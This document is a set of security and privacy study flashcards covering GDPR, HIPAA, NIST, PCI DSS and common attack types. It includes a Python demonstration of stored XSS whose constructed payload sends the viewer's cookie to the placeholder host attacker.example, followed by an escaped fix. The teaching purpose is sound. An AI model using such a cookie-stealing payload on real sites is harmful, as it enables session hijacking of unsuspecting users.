Security, Confidentiality, and Privacy Flashcards
General Data Protection Regulation (GDPR) 7 principles - EU regulation with extraterritorial reach (applies to organizations anywhere that process the personal data of people in the EU)
- Lawfulness, fairness & transparency
- Purpose limitation
- Data minimization
- Accuracy
- Storage limitation
- Integrity & confidentiality
- Accountability
COBIT governance system objective =
ensure alignment of IT with business goals & objectives
HIPAA Security Rule 3 Safeguards
- Administrative Safeguards
a. conducting regular risk assessments and audits
- Physical Safeguards
a. locking cabinets & doors that contain PHI
- Technical Safeguards
a. encrypting PHI in transit & at rest
b. installing firewalls & antivirus software
Access Control Mechanism:
Hardware/software features, operating/management procedures, and various combinations of these designed to prevent and detect unauthorized access and to permit authorized access in an automated system
National Institute of Standards and Technology (NIST) Privacy Framework:
voluntary tool designed to help organizations identify and manage privacy risk so they can meet their specific privacy goals and objectives while achieving key business outcomes
- Core: set of privacy activities and outcomes
- Profiles: selection of specific functions, categories & subcategories from the Core that reflect an organization's privacy goals & needs
- Implementation Tiers: tool for evaluating an organization's privacy risk management practices
Payment Card Industry Data Security Standard (PCI DSS):
optimize the security of credit, debit and cash card transactions
Single privacy objective (this wording is the AICPA Trust Services / Generally Accepted Privacy Principles (GAPP) privacy objective, not text from the NIST Privacy Framework) =
Personal information must be collected, used, retained, disclosed, and disposed of in compliance with the commitments in the entity's privacy notice and with the criteria set out in GAPP
CIA triad
- Confidentiality
- Integrity
- Availability
Privacy by design:
building privacy safeguards into a system from the outset rather than adding them afterwards
Privacy by default:
the most privacy-protective setting (e.g. minimal data collection, no sharing) applies automatically, without the user having to choose it
PCI DSS v4.0 Goals (6) and Core Requirements (12)
a. Build and Maintain a Secure Network and Systems
Requirement 1: Install and maintain network security controls.
Requirement 2: Apply secure configurations to all system components.
b. Protect Account Data
Requirement 3: Protect stored account data.
Requirement 4: Protect cardholder data with strong cryptography during transmission over open, public networks.
c. Maintain a Vulnerability Management Program
Requirement 5: Protect all systems and networks from malicious software.
Requirement 6: Develop and maintain secure systems and software
d. Implement Strong Access Control Measures
Requirement 7: Restrict access to system components and cardholder data by business need to know.
Requirement 8: Identify users and authenticate access to system components.
Requirement 9: Restrict physical access to cardholder data.
e. Regularly Monitor and Test Networks
Requirement 10: Log and monitor all access to system components and cardholder data.
Requirement 11: Test the security of systems and networks regularly.
f. Maintain an Information Security Policy
Requirement 12: Support information security with organizational policies and programs.
Email spoofing:
perpetrator forges the sender information of an email (From address, display name) so the message appears to come from someone else
Password spoofing:
perpetrator tricks user into logging into malicious system to capture username & password
Keyloggers:
malicious software (or a hardware device) that records every keystroke in order to capture user credentials and deliver them to the attacker
Social engineering:
uses persuasion/deception to gain access to IT systems (impersonation by phone or email, dumpster diving & shoulder surfing)
Electronic trashing:
accessing residual data that remains on storage media after a file has been deleted (deletion usually removes only the directory entry, not the data blocks)
Electronic piggybacking:
gaining unauthorized access to a resource by riding on another user's legitimate session or credentials (e.g. an unattended, still-logged-in terminal)
Network analysis attack:
perpetrator performs reconnaissance to build a complete profile of an organization's network infrastructure & architecture
Masquerading attack:
attempt to gain access to computer system or facility by posing as an authorized user
Email bombing:
sending identical email messages to a particular email address many times to overwhelm the mailbox or mail server
Malware attack:
deploying malicious software to compromise systems, steal data or disrupt operations
Sniffing attack:
eavesdropping on network traffic to intercept and capture data
Phishing attack:
tricking users into revealing sensitive info through emails or websites
Nonrepudiation:
ensure senders of a message cannot deny sending info & that receivers cannot deny receiving it
Web application attack:
exploiting vulnerabilities in web applications
Distributed denial of service (DDoS) attack:
overwhelming a target system with a flood of traffic or requests causing it to become unavailable to legitimate users
Cybersecurity attacker:
specific threat agent actively launching attacks against an organization's systems
SQL injection attack:
supplies crafted input that is concatenated into a database query so the input is interpreted as SQL code, altering the query's logic (prevented by parameterized queries)
Cross-site scripting (XSS) attack:
injects malicious scripts into a web application (e.g. via comments or input fields) so they execute in other users' browsers (prevented by escaping/encoding output for the context it is rendered in)
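An added example (not from the original flashcards) of the stored-comment case the card mentions: a comment body is interpolated into HTML raw versus escaped. The payload string, the attacker URL and the render function names are constructed for the demo and are not from the page:

```python
import html

# Constructed payload: a comment that tries to exfiltrate the viewer's cookie.
# attacker.example is a placeholder hostname used only in this demo.
PAYLOAD = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'

def render_comment_vulnerable(author, body):
    """Interpolates user input straight into the page, so markup in the
    comment is sent to every viewer's browser and executed as markup."""
    return f'<div class="comment"><b>{author}</b>: {body}</div>'

def render_comment_safe(author, body):
    """Escapes &, <, >, and quotes so the same input is displayed as text.
    html.escape covers HTML body and attribute-value context only; script,
    URL and CSS contexts need their own encoders."""
    return (f'<div class="comment"><b>{html.escape(author)}</b>: '
            f'{html.escape(body)}</div>')

def has_live_script_tag(markup):
    """Rough check used by the demo: does an unescaped <script> tag survive
    in the output a browser would parse?"""
    return "<script>" in markup.lower()

if __name__ == "__main__":
    print(render_comment_vulnerable("mallory", PAYLOAD))
    print(render_comment_safe("mallory", PAYLOAD))
```

The escaped output contains `&lt;script&gt;`, which the browser shows literally; the raw output contains a real `<script>` element that runs with the victim's cookies and session.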
Logic bomb:
uses a computer program to trigger an unauthorized malicious activity at a prespecified event (e.g. a financial calculation exceeding a specific dollar amount)
Worm:
independent computer program that reproduces by copying itself from one system to another without human involvement (e.g. uses open file shares to infect several workstations quickly)